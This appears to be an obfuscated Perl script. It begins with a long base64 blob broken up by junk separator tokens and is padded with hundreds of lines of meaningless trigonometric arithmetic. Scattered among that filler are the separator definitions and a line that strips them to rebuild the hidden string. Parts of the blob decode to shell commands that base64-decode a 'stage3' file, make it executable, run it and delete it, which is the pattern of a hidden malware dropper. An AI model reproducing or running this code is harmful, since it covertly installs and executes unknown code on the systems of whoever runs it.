0&d3#%a0&dg&%7-09#x#%a0&dZ#%a0&dm#%a0&dh&%7-09#h#%a0&dZ&8b#a2+y#%a0&d8#%a0&dz&%7-09#b&%7-09#T&8b#a2+h&%7-09#o&%7-09#c#%a0&dl#%a0&dF#%a0&d2&%7-09#L&8b#a2+2#%a0&dk&8b#a2+v&%7-09#W&%7-09#D&%7-09#h&%7-09#G#%a0&dL&8b#a2+0#%a0&dF&%7-09#k&8b#a2+Q&8b#a2+n&%7-09#h#%a0&d2&8b#a2+M&8b#a2+H&%7-09#J&8b#a2+N&8b#a2+d#%a0&dH&8b#a2+B#%a0&dW#%a0&dU&%7-09#V#%a0&dZ&%7-09#u&%7-09#M&8b#a2+C&8b#a2+9&8b#a2+6&%7-09#W&%7-09#n&8b#a2+h#%a0&du&8b#a2+d#%a0&d1#%a0&dV&8b#a2+q&8b#a2+V&%7-09#z#%a0&dg#%a0&d0&8b#a2+M#%a0&dT#%a0&dR&%7-09#y#%a0&dN#%a0&dG&%7-09#V&%7-09#J&8b#a2+Y#%a0&dz&8b#a2+c&8b#a2+v&%7-09#T&%7-09#n&8b#a2+d&8b#a2+U#%a0&dL&%7-09#1&%7-09#V#%a0&dG#%a0&dQ#%a0&dm#%a0&dd#%a0&d3&%7-09#V#%a0&dj#%a0&dQ&%7-09#4#%a0&dU#%a0&dH&%7-09#Z&8b#a2+t&%7-09#N&8b#a2+D&%7-09#R#%a0&dC#%a0&dO&%7-09#E&8b#a2+p&%7-09#l#%a0&db&%7-09#G#%a0&d4#%a0&d4#%a0&dM#%a0&dm#%a0&dh#%a0&dM&%7-09#O&%7-09#X#%a0&dp#%a0&d3&8b#a2+d&8b#a2+i&8b#a2+t#%a0&dr&8b#a2+M&8b#a2+E&%7-09#V#%a0&d2&8b#a2+Y&%7-09#i&8b#a2+t&%7-09#m&%7-09#L&%7-09#1&8b#a2+k#%a0&d4&8b#a2+R&8b#a2+W&8b#a2+Z&8b#a2+2&8b#a2+N&%7-09#2&%7-09#V&8b#a2+S&%7-09#Z#%a0&dT&8b#a2+R#%a0&dV&%7-09#R#%a0&dk&%7-09#k#%a0&d3&8b#a2+Y#%a0&dj&%7-09#N&8b#a2+N&%7-09#O&%7-09#E&8b#a2+V#%a0&dm#%a0&dO&8b#a2+X#%a0&dl&%7-09#I#%a0&dS#%a0&dT&%7-09#l#%a0&dZ#%a0&dS#%a0&dz&8b#a2+l&8b#a2+P&8b#a2+S&%7-09#D&%7-09#Q#%a0&dv&8b#a2+S#%a0&dj#%a0&dk#%a0&d3&%7-09#U#%a0&dE#%a0&dQ#%a0&dv&%7-09#R#%a0&dj&%7-09#g&%7-09#2&8b#a2+R&%7-09#k&%7-09#h&%7-09#C&%7-09#W#%a0&dG&%7-09#x#%a0&d3&%7-09#L&8b#a2+3#%a0&dZ&8b#a2+4&8b#a2+T#%a0&dD&%7-09#h#%a0&d5&8b#a2+N#%a0&dT&8b#a2+J&8b#a2+I#%a0&dT&%7-09#E&8b#a2+5&%7-09#m&%7-09#L#%a0&d0#%a0&dM&%7-09#0#%a0&dT#%a0&dC&%7-09#9#%a0&dt&8b#a2+W&%7-09#k&8b#a2+N#%a0&dY#%a0&dZ&8b#a2+j&8b#a2+d#%a0&ds&8b#a2+T&%7-09#i#%a0&d8&8b#a2+x&8b#a2+Z&%7-09#U&%7-09#o&%7-09#4#%a0&de#%a0&dD&%7-09#R&8b#a2+w#%a0&dU&%7-09#E&%7-09#c&8b#a2+v#%a0&da&%7-09#C&%7-09#t&%7-09#j&%7-09#a#%a0&dj&%7-09#I&%7-09#w#%a0&dd&8b#a2+l&8b#a2+k&8b#a2+x&%7-09#Q&8b#a2+W&8b#a2+w&%7-09#5&8b#a2+a&8b#a2+l&%7-09#Y&8b#a2+2&%7-09#U#%a0&dE#%a0&dx#%a0&dI#%a0&dL&8b#a2+2#%a0&dZ&8b#a2+S&8b#a2+Y#%a0&dX#%a0&dp#%a0&dm#%a0&db&8b#a2+y&%7-09#9&8b#a2+6#%a0&dW&%7-09#n&%7-09#h&8b#a2+4&8b#a2+a&8b#a2+D#%a0&dc&%7-09#5&%7-09#Q#%a0&dy&8b#a2+t&%7-09#k#%a0&dZ#%a0&dH&%7-09#d#%a0&dS&%7-09#L#%a0&d1&8b#a2+B&8b#a2+1&%7-09#V&%7-09#l&%7-09#l&%7-09#M&8b#a2+Z&8b#a2+m&8b#a2+p#%a0&dp&8b#a2+U&8b#a2+D#%a0&dN&%7-09#5#%a0&dU#%a0&dE&8b#a2+8#%a0&dv&%7-09#W&8b#a2+X&%7-09#Z&%7-09#Q#%a0&da&8b#a2+T#%a0&dZ&8b#a2+1&%7-09#S&8b#a2+E&%7-09#h#%a0&dG&8b#a2+Y&8b#a2+T#%a0&dI&8b#a2+2#%a0&dY#%a0&dj#%a0&dl#%a0&dL&%7-09#O&%7-09#H&8b#a2+Z&%7-09#v&%7-09#W&%7-09#D&%7-09#l&%7-09#w&%7-09#c#%a0&d2&%7-09#Q#%a0&dz#%a0&db&8b#a2+j#%a0&dV&8b#a2+F&8b#a2+Z&%7-09#j&%7-09#B&8b#a2+R&8b#a2+Z&%7-09#F&%7-09#B&%7-09#D&%7-09#Q&%7-09#2#%a0&dl&%7-09#Q&%7-09#K&%7-09#z&8b#a2+c#%a0&dz&%7-09#Z#%a0&d2&8b#a2+g&%7-09#y&8b#a2+b&%7-09#D#%a0&dd&8b#a2+j&%7-09#W&8b#a2+F&8b#a2+B&%7-09#y#%a0&dN#%a0&dT&%7-09#N#%a0&dR#%a0&dd#%a0&di#%a0&d9&8b#a2+n&%7-09#O#%a0&dW#%a0&dd&%7-09#m&%7-09#N&8b#a2+j#%a0&dN&%7-09#s&8b#a2+L#%a0&d0&8b#a2+Y&8b#a2+z#%a0&dY&%7-09#z&8b#a2+R&%7-09#C&%7-09#c&8b#a2+1&8b#a2+J#%a0&dR#%a0&dV#%a0&dD&%7-09#h#%a0&dG#%a0&de#%a0&dU#%a0&dd&8b#a2+3&8b#a2+O#%a0&dX#%a0&dh&%7-09#G&8b#a2+b&8b#a2+n&%7-09#Z&8b#a2+5&%7-09#N&%7-09#S&8b#a2+t&8b#a2+m&8b#a2+d&8b#a2+F&8b#a2+N#%a0&dT&8b#a2+M#%a0&dH#%a0&dM&8b#a2+r&8b#a2+b&%7-09#3#%a0&dE&8b#a2+x&%7-09#M&%7-09#E#%a0&d9#%a0&d2&8b#a2+e&%7-09#W#%a0&d9&8b#a2+F&8b#a2+d&%7-09#k&%7-09#N&%7-09#Y&%7-09#K&8b#a2+0#%a0&d1&%7-09#2&%7-09#N&8b#a2+2#%a0&dY&%7-09#3#%a0&dW&8b#a2+E&%7-09#c&%7-09#0&%7-09#W&8b#a2+l&%7-09#J#%a0&d2#%a0&dL&%7-09#2&8b#a2+Z#%a0&d3#%a0&dR#%a0&dl&%7-09#F&8b#a2+T&%7-09#d#%a0&d0#%a0&dV&%7-09#D&8b#a2+S&%7-09#G&8b#a2+d#%a0&dN&%7-09#V#%a0&dU&%7-09#F&8b#a2+B&%7-09#Q&8b#a2+U#%a0&dF&%7-09#D&8b#a2+Q&8b#a2+U#%a0&dJ&%7-09#v&%7-09#Y&%7-09#j&%7-09#l&%7-09#O#%a0&dW&%7-09#U&8b#a2+p#%a0&dO&%7-09#O#%a0&dW&%7-09#9&%7-09#Y&%7-09#U&8b#a2+V&8b#a2+F#%a0&dK&8b#a2+Q#%a0&dU&%7-09#F&%7-09#D&%7-09#Q#%a0&dV#%a0&dB#%a0&dn&%7-09#Q&%7-09#U&%7-09#F#%a0&dF&%7-09#Z#%a0&d0&%7-09#F&%7-09#Z#%a0&dQ&%7-09#U#%a0&dF&8b#a2+B&%7-09#Q&8b#a2+U&8b#a2+F#%a0&dB#%a0&dQ&8b#a2+U&8b#a2+F&8b#a2+B&%7-09#Q&8b#a2+U&%7-09#F#%a0&dB&%7-09#L&8b#a2+1&8b#a2+l&%7-09#F&%7-09#Q&8b#a2+U#%a0&dF#%a0&dB#%a0&dQ&%7-09#U#%a0&dF&%7-09#h&8b#a2+V&%7-09#z&%7-09#U&8b#a2+w#%a0&dW&%7-09#l&8b#a2+h&%7-09#K&8b#a2+Z&8b#a2+l&8b#a2+p#%a0&dt#%a0&db&%7-09#H&%7-09#N#%a0&da&%7-09#W&8b#a2+E&8b#a2+1&8b#a2+2&%7-09#Y#%a0&dz#%a0&dN&8b#a2+S#%a0&da&%7-09#F&%7-09#o&%7-09#y#%a0&dV&8b#a2+X&%7-09#p&%7-09#W#%a0&dV&8b#a2+l&8b#a2+F#%a0&dG#%a0&dQ&8b#a2+U&8b#a2+F&8b#a2+P#%a0&dV#%a0&dF&%7-09#Y#%a0&dz&8b#a2+S&8b#a2+m&%7-09#1#%a0&dk#%a0&dW&%7-09#G&%7-09#d#%a0&dM&%7-09#Q&8b#a2+U&8b#a2+F&%7-09#F#%a0&dR#%a0&dT#%a0&dZ#%a0&dB#%a0&dT#%a0&dU&%7-09#F&%7-09#B&8b#a2+Q#%a0&dV&8b#a2+R&8b#a2+v&8b#a2+Q#%a0&dX#%a0&dd&8b#a2+B&%7-09#Q&8b#a2+V#%a0&dV&8b#a2+F#%a0&dc&8b#a2+0&%7-09#Z&%7-09#C&%7-09#Z#%a0&d0&%7-09#F&8b#a2+B#%a0&dQ&%7-09#U&8b#a2+F#%a0&dB&%7-09#Q&%7-09#k&8b#a2+F#%a0&dB#%a0&dR&%7-09#U&%7-09#F&8b#a2+X&%7-09#Q&%7-09#U&%7-09#F&%7-09#B#%a0&dQ#%a0&dU&8b#a2+Z&%7-09#B#%a0&dS#%a0&dk#%a0&dF#%a0&dB&8b#a2+Q&%7-09#U&%7-09#F&%7-09#B&8b#a2+Q#%a0&dT&8b#a2+0#%a0&d9#%a0&dI#%a0&dj&8b#a2+s#%a0&dg&8b#a2+Z&%7-09#W&8b#a2+N#%a0&do#%a0&db&8b#a2+y#%a0&dA&8b#a2+k&%7-09#c#%a0&d3#%a0&dR#%a0&dh#%a0&dZ&8b#a2+2&8b#a2+U#%a0&dz&8b#a2+I&8b#a2+H&8b#a2+w#%a0&dg#%a0&dY#%a0&dm&8b#a2+F&8b#a2+z&%7-09#Z#%a0&dT#%a0&dY&%7-09#0#%a0&dI&%7-09#C&%7-09#1&8b#a2+k&%7-09#I#%a0&dH&%7-09#w&%7-09#g#%a0&dY&8b#a2+n#%a0&dV#%a0&dz#%a0&de&8b#a2+W#%a0&dJ#%a0&dv&%7-09#e&8b#a2+C&8b#a2+B#%a0&d1#%a0&db&8b#a2+n&8b#a2+p&8b#a2+p&%7-09#c#%a0&dC&8b#a2+A&8b#a2+t&8b#a2+c&%7-09#C&8b#a2+A&8b#a2+t&%7-09#I&%7-09#D#%a0&d4#%a0&dg#%a0&dc&%7-09#3#%a0&dR#%a0&dh&%7-09#Z&%7-09#2&8b#a2+U&%7-09#z&%7-09#O&%7-09#y&8b#a2+B#%a0&dj#%a0&da&%7-09#G&8b#a2+1&8b#a2+v&%7-09#Z&8b#a2+C&8b#a2+A&8b#a2+r#%a0&de&%7-09#C&%7-09#B&8b#a2+z&8b#a2+d&%7-09#G&%7-09#F#%a0&dn#%a0&dZ&8b#a2+T&8b#a2+M&8b#a2+7&8b#a2+I&8b#a2+C#%a0&d4&%7-09#v&8b#a2+c#%a0&d3#%a0&dR&%7-09#h&8b#a2+Z&8b#a2+2&%7-09#U#%a0&dz#%a0&dO#%a0&dy&8b#a2+B&8b#a2+y#%a0&db&8b#a2+S&8b#a2+B&8b#a2+z#%a0&dd#%a0&dG#%a0&dF&%7-09#n&%7-09#Z#%a0&dT#%a0&dM&8b#a2+7";

my $ywwbsxq = -3.51;
my $dydevhh = sin(-25.754) - sin(-5.89784) - cos(-28.5551);
my $jlrwetz = -22.84;
my $jhxcyvk = sin(-40.8485577) * cos(28.0863) * cos(-18.90423);
$jlrwetz = sin($dydevhh) + sin(2.07);
print "$jhxcyvk\n";
$jlrwetz = sin($dydevhh) + cos($dydevhh) - sin($ywwbsxq) - cos($dydevhh);
print "$dydevhh\n";
$jlrwetz = cos($jhxcyvk) - sin(23.13844) + sin($jhxcyvk);
print "$jhxcyvk\n";
$jlrwetz = sin(-28.09673) - sin(25.667904) * sin($ywwbsxq);
print "$jhxcyvk\n";

my $zuobkro = cos(35.38) * cos(31.1583095) * sin(-23.971);
my $sceykff = sin(-39.601462) + sin(-41.1469657) - sin(-14.7198303) * sin(25.6036178);
my $riyntwz = -42.72;
$zuobkro = cos(34.639967) * sin($riyntwz) + sin(-16.464186);
print "$zuobkro\n";
$zuobkro = cos($zuobkro) - cos($sceykff);
$sceykff = sin(29.3) * cos($sceykff) * sin(-11.51872);

my $jzqzbqm = cos(13.519559) - sin(-43.752) + sin(39.29) * sin(24.373);
my $sapysfc = cos(-41.03) * sin(12.79) + sin(13.4259237);
$jzqzbqm = cos(3.714) * sin($sapysfc) * cos($sapysfc);
$sapysfc = cos(-25.77354) - cos($sapysfc) - sin($jzqzbqm) + sin(44.1304);
print "$sapysfc\n";

my $sceexxe = cos(46.413339) * sin(29.831);
my $cbusbnq = 8.32738;
$cbusbnq = cos(-4.877908) - sin(-1.003) - cos($sceexxe) - sin($cbusbnq);
print "$sceexxe\n";
$sceexxe = sin(-3.830366) + cos($cbusbnq);
print "$cbusbnq\n";

my $shknrxw = sin(48.402726) + sin(-10.8559425) + sin(-2.95);
my $ejfgoda = 35.819;
my $ashumkr = cos(-44.448) * cos(-45.574) + cos(-2.5565) * sin(40.48);
$ashumkr = sin($shknrxw) - cos(-26.82932) + sin($ashumkr) * cos($ejfgoda);
print "$ashumkr\n";
$ashumkr = cos(-13.0069) + cos(0.59718);
$ashumkr = cos(36.4562) - cos($ashumkr) + sin($ejfgoda);
print "$ejfgoda\n";

my $ikvpkwa = cos(-26.9926) - sin(-12.42822);
my $untlonc = 30.83529;
my $xadcxha = sin(-7.48) + sin(-24.8425278);
my $lnatskb = sin(-22.671) * sin(32.6) * sin(-34.014578);
$xadcxha = sin(8.1063) - cos($lnatskb);
print "$xadcxha\n";
$lnatskb = sin(-41.6946332) + cos($lnatskb) - sin($untlonc);
print "$xadcxha\n";
$lnatskb = sin($untlonc) * cos(23.439796) + cos($xadcxha);
print "$untlonc\n";
$xadcxha = sin(-40.95496) + sin(-20.0551) * cos($lnatskb) * sin($lnatskb);
print "$untlonc\n";

my $olwvnwj = 41.22566;
my $qzkeiqb = sin(-48.0494392) + cos(-30.941778) + cos(3.6793208);
my $zzltabo = cos(-28.257009) - sin(-34.27989) - cos(-9.05) * cos(-17.969655);
my $yoglxmp = -27.4689;
$olwvnwj = sin($olwvnwj) * cos(-16.88043) * cos(-49.8498361);
print "$olwvnwj\n";
$zzltabo = sin(30.844748) * sin(-4.05703);
print "$olwvnwj\n";
$zzltabo = sin(-29.808) * cos(-31.832982);
$yoglxmp = sin(-1.84235) + cos(-13.2304);
print "$zzltabo\n";

my $iwlgjnt = 21.558;
my $sdfyloy = 47.884494;
my $ogihzge = 25.33222;
my $akzhkwj = 2.566;
$akzhkwj = cos(-11.581891) + sin(8.0828944);
$akzhkwj = cos(-35.7765028) - sin($iwlgjnt) * sin($akzhkwj) + cos($sdfyloy);
$sdfyloy = sin(30.86) - cos($akzhkwj);
$akzhkwj = sin(32.806223) - sin($ogihzge) * sin(41.9355565);
print "$akzhkwj\n";

my $jojxkpq = sin(38.137921) * sin(-37.389701) + cos(-34.638085) - cos(45.3999);
my $wvtefny = sin(21.794561) * sin(19.37);
$jojxkpq = cos($jojxkpq) * sin(-43.493937);
$wvtefny = sin(17.0676289) - cos($wvtefny) + cos(-20.95739) + cos(-44.311147);

my $jagxnxs = 3.456517;
my $qerfztx = 19.85;
my $goszumj = sin(40.28) * sin(-44.24287) + cos(-7.97);
my $irqexgb = -5.5863;
$qerfztx = cos($irqexgb) * cos(-8.4642567) + cos(-34.33636);
$irqexgb = sin(-27.737116) + sin(-30.26) * sin(-38.12) - sin(0.2359549);
$qerfztx = sin($irqexgb) * sin(-16.329862) * cos($irqexgb) - sin(-42.37);
print "$goszumj\n";
$goszumj = sin(-40.88) + sin($irqexgb);

my $lorfjfe = cos(-6.1136651) - cos(-3.1905) - cos(16.249) + sin(-36.212);
my $cdxupao = sin(14.15) - cos(-36.930523);
$lorfjfe = sin(30.7) * sin(5.9251) * sin(27.2957092) - cos(-30.898721);
$lorfjfe = cos($cdxupao) * cos(14.999608);
print "$lorfjfe\n";

my $zlqjaxp = -42.165789;
my $japjano = cos(15.9) - sin(48.2545) * cos(6.4692428) + sin(46.68888);
my $dxjnbdz = -22.93;
my $cavonxy = -37.8103079;
$dxjnbdz = sin($cavonxy) - cos($dxjnbdz) - cos($japjano);
print "$cavonxy\n";
$cavonxy = sin(45.5549036) * cos($japjano) * cos($cavonxy) * cos($zlqjaxp);
print "$zlqjaxp\n";
$cavonxy = cos($japjano) + sin(-38.8994) + sin(50.4904) + sin(-24.46599);
$zlqjaxp = cos(-11.0238) + sin(22.04);
print "$cavonxy\n";

my $rupgwtl = 10.74;
my $sqssany = -38.444;
$sqssany = sin($rupgwtl) * cos($sqssany) - sin(11.4223) + cos($sqssany);
print "$rupgwtl\n";
$sqssany = cos($rupgwtl) - cos(-1.0745288) * cos($sqssany) - sin(36.6307277);
print "$rupgwtl\n";

my $kktyesk = sin(20.821623) * sin(-35.927134);
my $hddvwiq = sin(29.82) - cos(23.9008258);
my $vcfdgdo = cos(-47.73) * cos(4.74049) * sin(-13.6254);
$kktyesk = sin(32.34227) - sin($kktyesk);
$vcfdgdo = sin($vcfdgdo) * sin(30.07);
$hddvwiq = cos($kktyesk) - cos($kktyesk);
print "$vcfdgdo\n";

my $yhpbsgb = sin(-14.563) - sin(-33.78) * cos(12.167) + cos(-43.0831806);
my $fsdnkyp = cos(4.2938) * sin(16.82) + cos(17.293627) - sin(-10.806037);
my $zfpxkps = 30.0292;
$fsdnkyp = sin(13.3324) + sin($zfpxkps);
$fsdnkyp = cos($yhpbsgb) - cos(0.188);
print "$fsdnkyp\n";
$yhpbsgb = cos($fsdnkyp) * cos(5.4316) + sin(17.656);

my $qponxes = -11.3;
my $disiicg = cos(-13.85889) + sin(36.487) * sin(-48.531673) + cos(47.169);
my $mwiubmu = sin(37.8130389) - sin(7.420545);
$mwiubmu = sin(-30.4481) + cos($mwiubmu) - sin($qponxes) * cos($qponxes);
print "$mwiubmu\n";
$mwiubmu = sin($mwiubmu) * sin($mwiubmu) - cos(7.07) - cos($disiicg);
$mwiubmu = sin($disiicg) + sin(-13.14) * sin($qponxes) + sin(49.0418832);

my $tqoiewb = "&%7-09#";

my $yybqshj = sin(-40.0758327) - cos(35.164281) - sin(-3.1077) + sin(40.3254756);
my $wtzovbo = cos(28.1754) + cos(-39.138019);
my $amsdnjt = 43.291894;
my $hcsbvzn = cos(-6.5249081) + cos(-16.6266) - cos(27.53);
$yybqshj = sin($yybqshj) * sin(43.10242);
$hcsbvzn = cos($amsdnjt) + cos(32.876015);
print "$yybqshj\n";
$yybqshj = sin(21.79997) - cos($hcsbvzn);
print "$amsdnjt\n";
$yybqshj = cos($hcsbvzn) + sin($hcsbvzn);

my $axreonj = sin(12.5) * cos(48.50371);
my $lfrlcwv = cos(-35.5371) + cos(-15.902);
my $xaysnmv = cos(26.13) * cos(7.633792) * sin(15.882);
my $nhxyvdo = sin(42.57969) * sin(2.568666) * sin(-20.4482658);
$lfrlcwv = cos(-9.679) + sin($nhxyvdo) + sin(-32.5008755) + cos(9.0814317);
print "$nhxyvdo\n";
$xaysnmv = cos(-42.4547) - sin(-49.09894) + sin($axreonj);
$axreonj = cos($xaysnmv) * cos($lfrlcwv) - cos($nhxyvdo);
print "$nhxyvdo\n";
$axreonj = sin($xaysnmv) - cos(9.76) * cos($xaysnmv);
print "$lfrlcwv\n";

my $knonkur = sin(15.022065) + cos(29.2601) + sin(-22.70258);
my $sgbjrqv = cos(-41.237) + sin(19.373) * sin(2.6794043) * cos(12.0137);
$knonkur = sin($knonkur) - cos(-9.6509894) + sin($sgbjrqv) * cos($sgbjrqv);
print "$knonkur\n";
$knonkur = sin(15.5) - cos($sgbjrqv) * cos(26.7351) - sin(-43.635);

my $qgxklin = 24.1012;
my $ewifxom = 50.641;
my $xloslvg = cos(7.5323807) * sin(-49.36);
my $vyucpvy = -31.475;
$xloslvg = sin(17.7395) - sin(24.81736);
$vyucpvy = sin(4.47) - cos($ewifxom) + sin($vyucpvy);
$qgxklin = sin(-36.6409251) * sin(1.1834) * sin($ewifxom) * sin($qgxklin);
$xloslvg = cos($qgxklin) * cos(-49.2084) * sin($xloslvg);
print "$qgxklin\n";

my $vhwovct = 40.812228;
my $ryamutn = sin(2.594) - cos(-4.7677977) + sin(-37.7973);
my $efxlrzj = sin(28.192) * cos(4.5604463);
my $qforacf = -19.1528;
$vhwovct = sin($efxlrzj) + sin($qforacf) - cos(26.75) * sin(7.18);
print "$ryamutn\n";
$efxlrzj = cos($vhwovct) * cos($efxlrzj);
$qforacf = cos(-11.103676) * cos($qforacf) + sin($qforacf) * sin($vhwovct);
print "$vhwovct\n";
$qforacf = cos($qforacf) * sin(-33.797325);

my $dnjlwzo = sin(50.818) - sin(11.101393) - cos(1.191) - cos(-22.59352);
my $axtjkud = sin(-33.57) + sin(-3.2161) * sin(13.6703);
$axtjkud = cos(-10.68985) - cos(-22.16);
print "$axtjkud\n";
$axtjkud = cos($dnjlwzo) * sin(-25.7435) - cos(13.327) * sin($dnjlwzo);
print "$dnjlwzo\n";

my $muujfny = sin(-31.717) * cos(19.0251111);
my $tfiynif = cos(44.297984) - cos(14.616377) + cos(-22.7594199) + cos(-30.56768);
$tfiynif = sin(-8.73211) * sin($tfiynif) - cos(21.6366) + sin($tfiynif);
$muujfny = sin(-27.5363) - sin(-33.743) + sin(25.1977) * cos(-6.19);

my $mpwmher = "#%a0&d";

my $yodnzyi = 23.419;
my $onwrwhs = -34.05824;
$yodnzyi = sin($yodnzyi) - cos($yodnzyi) + cos(21.829767);
print "$onwrwhs\n";
$onwrwhs = sin($onwrwhs) - cos($onwrwhs) - cos(-15.5160608);
print "$yodnzyi\n";

my $mqflzsm = cos(39.8017) - sin(-21.231535) - sin(-27.6017155);
my $quwsldw = 45.886929;
$quwsldw = sin(-34.7318) * sin(28.306);
print "$quwsldw\n";
$mqflzsm = sin($quwsldw) - cos(45.365984);

my $xeaohhj = cos(-4.14022) + sin(50.266) * sin(-5.142);
my $mywllae = -46.0184228;
my $pwoxpju = cos(17.873869) + sin(24.5852779);
$mywllae = cos(46.29) + cos(19.769617) + cos(-33.65);
print "$mywllae\n";
$pwoxpju = sin($mywllae) - sin(41.981) + cos(-18.123819);
$pwoxpju = sin($pwoxpju) * sin(10.3348496);
print "$xeaohhj\n";

my $eybagad = cos(43.9910424) + cos(39.15) + sin(40.92) - sin(30.534338);
my $zyvgnbj = -18.168452;
$zyvgnbj = cos(-48.38) * cos($eybagad) * cos(-16.4887842);
$zyvgnbj = sin(-34.157) + cos(44.94);
print "$zyvgnbj\n";

my $cystduj = -24.2042;
my $nbgmzqg = cos(19.8228) + cos(-3.804) + sin(47.7751465) * sin(-40.89765);
my $mtnmduw = -37.0697;
$mtnmduw = cos(10.76753) * cos(22.326) - sin($mtnmduw) * sin($mtnmduw);
$nbgmzqg = sin(27.43693) + cos($mtnmduw) * cos($nbgmzqg) - sin($mtnmduw);
print "$nbgmzqg\n";
$nbgmzqg = sin(-32.650199) + cos(-25.3733377) * sin($cystduj) + cos(-6.1901176);

my $afrsanb = cos(-32.598108) - sin(20.165674) - cos(-0.8629);
my $qkqshkc = sin(5.01248) - cos(-31.5817655) - cos(24.093) - sin(-8.1262);
my $nyqeaqn = -30.629;
$afrsanb = sin($qkqshkc) - sin($nyqeaqn);
$afrsanb = cos(33.036) * sin($afrsanb);
$qkqshkc = sin($nyqeaqn) + sin(-9.67) * cos($qkqshkc) - cos(-11.897);

my $sbvgcqo = -35.734;
my $gnqaatk = sin(21.89) * cos(35.27) - cos(-7.3282361) + cos(2.431);
my $eonfavb = -11.8071855;
$sbvgcqo = sin($sbvgcqo) * cos($eonfavb);
$sbvgcqo = cos(-40.8194) + cos($eonfavb) + cos(10.54707);
print "$sbvgcqo\n";
$gnqaatk = sin($gnqaatk) + sin($sbvgcqo) - sin($gnqaatk) + cos(-43.79267);

my $ykqgrkn = sin(46.2054) * sin(-20.602148);
my $hvjbdue = -41.58317;
my $kpjtefv = -7.149725;
my $spztzwn = 41.088;
$kpjtefv = cos($spztzwn) * sin($spztzwn) * cos($spztzwn);
$ykqgrkn = sin($hvjbdue) - sin(-7.07126);
print "$hvjbdue\n";
$hvjbdue = sin(-12.560568) * cos($spztzwn) - sin($ykqgrkn);
$hvjbdue = sin($spztzwn) * cos(18.2014928) * cos(-26.2785821);
print "$ykqgrkn\n";

my $vymcmyx = sin(-45.846) - sin(7.11) * cos(26.32);
my $eezgdfv = sin(-21.05719) + sin(-24.71) + sin(-24.14) + sin(35.79);
my $xvrdnbd = -11.367;
$xvrdnbd = cos($xvrdnbd) - cos($eezgdfv);
$xvrdnbd = cos($xvrdnbd) - cos(-16.16917) + sin(-30.82112) + sin(-27.445);
print "$xvrdnbd\n";
$xvrdnbd = cos(18.417) * cos(49.217) + cos(-3.8431) - sin(-2.915197);
print "$eezgdfv\n";

my $pqergoi = "&8b#a2+";

my $wiltrae = sin(50.3723922) + sin(-46.9617031) + cos(49.4244) - cos(39.05898);
my $rmedhca = sin(-5.203127) - sin(15.2069) + cos(14.0669593) * sin(-26.34);
my $sglkuqg = -38.12;
$sglkuqg = sin(-13.01) + cos(-38.01) - cos($wiltrae);
$rmedhca = sin($sglkuqg) * cos(17.299168) * sin($sglkuqg) * cos(-39.0101);
print "$sglkuqg\n";
$sglkuqg = cos(8.1572776) * cos(15.68428) * cos(37.13);

my $wudmhou = -20.1678;
my $izivipj = 6.514069;
my $lhybljo = -3.76663;
$wudmhou = cos($izivipj) + cos(10.9230306);
$izivipj = sin(-2.0218922) - cos(16.28) + sin(-25.64348) + cos($izivipj);
print "$wudmhou\n";
$lhybljo = sin($wudmhou) - sin(-18.1277188) + sin($wudmhou) + sin($wudmhou);

my $aqkpyed = sin(48.69684) * sin(7.3501851);
my $educily = cos(15.9342) * sin(43.672);
my $jlhuaik = sin(20.91) - sin(-4.546) * sin(24.1997);
my $zuvhzya = cos(-32.8267898) + cos(12.319498) + cos(9.251799);
$aqkpyed = cos($zuvhzya) - sin(30.99819) * sin(36.331698);
print "$educily\n";
$zuvhzya = cos($educily) - sin($aqkpyed) - cos(44.288462) - cos(25.9184746);
$educily = sin($jlhuaik) * sin($zuvhzya);
$aqkpyed = sin($educily) - sin($educily) - cos(-24.195132);
print "$zuvhzya\n";

my $blkftec = -42.07;
my $jimtuvi = cos(-34.386952) + cos(37.56286) - sin(25.6215733) + sin(-39.7799);
my $ipjtqvg = sin(3.52) - cos(-33.4276) - cos(22.156096);
$ipjtqvg = cos(-0.4936849) * sin(7.6054) - sin(40.2960927) - sin($blkftec);
$jimtuvi = sin($blkftec) - sin($blkftec);
$blkftec = sin($ipjtqvg) + sin($jimtuvi);
print "$ipjtqvg\n";

my $llyygqj = 6.0549329;
my $pkhrskx = cos(0.5280077) - sin(-45.64619);
my $ayudeuy = 25.9101;
$llyygqj = sin($pkhrskx) + cos($ayudeuy);
print "$llyygqj\n";
$pkhrskx = cos($pkhrskx) * cos(-24.989032) + cos(-42.921) - cos($llyygqj);
$ayudeuy = sin(23.86) - cos($pkhrskx);

$dsflkjn =~ s/\Q$tqoiewb\E//g;

my $pdrivcq = -7.884687;
my $zjzivru = cos(5.5403) + cos(-0.9056634);
my $shvpipr = cos(-30.62661) * sin(13.8922);
$zjzivru = sin($pdrivcq) - sin(-39.61) * cos(-37.4195878) - sin($pdrivcq);
$pdrivcq = cos(28.90985) - sin(-16.16863) + cos($pdrivcq);
print "$zjzivru\n";
$zjzivru = cos(-18.078) - cos(29.27);
print "$zjzivru\n";

my $azgdjxm = sin(1.29) * sin(31.149) + sin(22.8843) * cos(20.401);
my $xzmaloi = sin(46.0307) + sin(43.69) + sin(49.079613);
my $hfeytpz = sin(-20.179) * sin(27.116) - cos(-22.584);
my $pqxjndr = cos(50.100903) * cos(-32.5256642) + sin(6.4931);
$pqxjndr = sin($xzmaloi) * cos($xzmaloi) - sin(-36.0575);
$azgdjxm = cos($pqxjndr) - sin(-10.85);
$xzmaloi = cos(-35.61) * cos($azgdjxm) - sin(-5.468593);
$pqxjndr = cos(-25.9725) * cos(-16.74435) * sin(-20.853);

my $jviojse = sin(-0.5164) + cos(-33.4182527);
my $byqgfel = 48.17554;
$jviojse = sin(-20.65693) + cos($jviojse) * sin($byqgfel) - sin(-19.2975732);
print "$byqgfel\n";
$byqgfel = cos(38.218) * sin(-29.8565228) * cos($byqgfel) * sin(21.595);
print "$jviojse\n";

my $bepwmue = sin(-19.828369) * cos(-23.431);
my $hdscdbb = sin(-6.51638) + cos(-29.969) - cos(12.97) - cos(-13.285);
$hdscdbb = sin($bepwmue) * cos(-23.77) - cos(-21.9283) - cos($hdscdbb);
print "$hdscdbb\n";
$hdscdbb = cos($hdscdbb) - cos(16.45024) - cos($bepwmue);
print "$hdscdbb\n";

my $mlngetq = sin(-44.8034) * sin(2.6195618) * sin(-31.1283) + cos(39.43);
my $lzgoevt = 10.4391882;
my $atjqycn = -15.664341;
$atjqycn = sin($mlngetq) - sin(27.543);
print "$mlngetq\n";
$lzgoevt = cos(-32.2392) - sin($atjqycn) * sin(-35.108) - cos($lzgoevt);
print "$lzgoevt\n";
$lzgoevt = sin($lzgoevt) * cos(-43.4026984) + sin(-7.3586238);
print "$lzgoevt\n";

